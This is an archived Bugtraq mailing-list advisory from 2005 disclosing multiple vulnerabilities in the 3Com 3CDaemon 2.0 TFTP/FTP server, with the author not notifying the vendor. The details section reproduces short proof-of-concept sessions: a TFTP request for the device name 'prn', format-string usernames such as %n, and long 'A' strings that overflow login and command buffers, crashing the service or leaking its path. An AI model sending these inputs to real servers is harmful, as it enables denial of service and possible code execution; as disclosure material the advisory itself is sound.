Bugtraqmailing list archives
3Com 3CDaemon Multiple Vulnerabilities
From: "Sowhat ." <smaillist () gmail com>
Date: Tue, 4 Jan 2005 18:23:06 +0800
3Com 3CDaemon Multiple Vulnerabilities By Sowhat04.JAN.2005http://secway.org/advisory/ad20041011.txt[I.T.S] Security Research TeamProduct Affected:3Com 3CDaemon 2.0 revision 10 Vendor:www.3Com.com(1) BACKGROUD3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows platforms, developed by dan_gill@3Com. For more information,http://support.3com.com/software/utilities_for_windows_32_bit.htmftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip3CDaemon is full of holes,ISS and Wang Ning <nwang () scn com cn> has already reported some bugz about 3CDaemon(see:http://xforce.iss.net/xforce/xfdb/8970http://www.securityfocus.org/bid/11944)And I doucument some other well-known bugz here again :)(2) DetailsRemote exploitation of Multiple vulnerabilities in the 3CDaemon allowsattackersto execute arbitrary command as the user running 3CDaemon (usually Administrator).Some of these Vulnerabilities didnt need a valid username and password to login.There are several vulnerabilies1.TFTP Reserved Device Name Denial of ServiceD:\WINDOWS\system32>tftp -i 192.168.0.1 get prnThe 3CDaemon will be crashed with some msgs like "Microsoft Visual C++ Runtime library""Runtime Error!""Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe ""abnormal program termination". 2.FTP Username Format String vulnerabilityH:\>ftp 192.168.0.1Connected to 192.168.0.1.220 3Com 3CDaemon FTP Server Version 2.0User (192.168.0.1:(none)): %nConnection closed by remote host.OR:H:\>ftp 192.168.0.1Connected to 192.168.0.1.220 3Com 3CDaemon FTP Server Version 2.0User (192.168.0.1:(none)): %s331 User name ok, need passwordPassword:[anythinghere]530 Login access deniedLogin failed.ftp>And then the 3CDaemon is dead.3.FTP long Username Buffer overflowD:\WINDOWS\system32>ftp 192.168.0.1Connected to 192.168.0.1.220 3Com 3CDaemon FTP Server Version 2.0User (192.168.0.1:(none)):501 Invalid or missing parametersLogin failed.ftp> user AAA..[about 241 A here]...AAAAAConnection closed by remote host.4.Multiple FTP command long parameter Buffer overflowIncluding:cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD, and so on(Maybe this is what ISS's Advisory talking about)ftp> cd AAA..[about 398 A here]...AAAAAConnection closed by remote host.ftp>ftp> ls AAA..[about 247 A here]...AAAAA200 PORT command successful.Connection closed by remote host.ftp> put 1.txt AAA..[about 247 A here]...AAAAA200 PORT command successful.532 Need account for storing filesConnection closed by remote host.It seems that the length of the "A" is different from every command.5.Multiple FTP command Format stringIncluding:cd,delete,rename,rmdir,literal,stat,CWD, and so on230 User logged inftp> cd %nConnection closed by remote host.ftp> 6.Multiple FTP command Reserved Device Name Information LeakIncluding cd,and so onThe following command will disclosure the physical path of the 3cdaemonftp> cd aux550 aux : C:/3cdaemon/aux is not a directory!ftp> cd lpt1550 lpt1 : C:/3cdaemon/lpt1 is not a directory!and also ,CD an exsiting filename will disclosure physical path too.ftp> cd toolz.rar550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory!There are still some other boring bugz ,but it's enough : >(3) WORKAROUNDWorkaroud ? No......(4) Vendor ResponseSince it seems that 3com didnt maintained 3CDaemon for a long long time ,I dint contact them :)http://secway.orgThank to all the members of ITS Security Team
Current thread:
- 3Com 3CDaemon Multiple VulnerabilitiesSowhat . (Jan 04)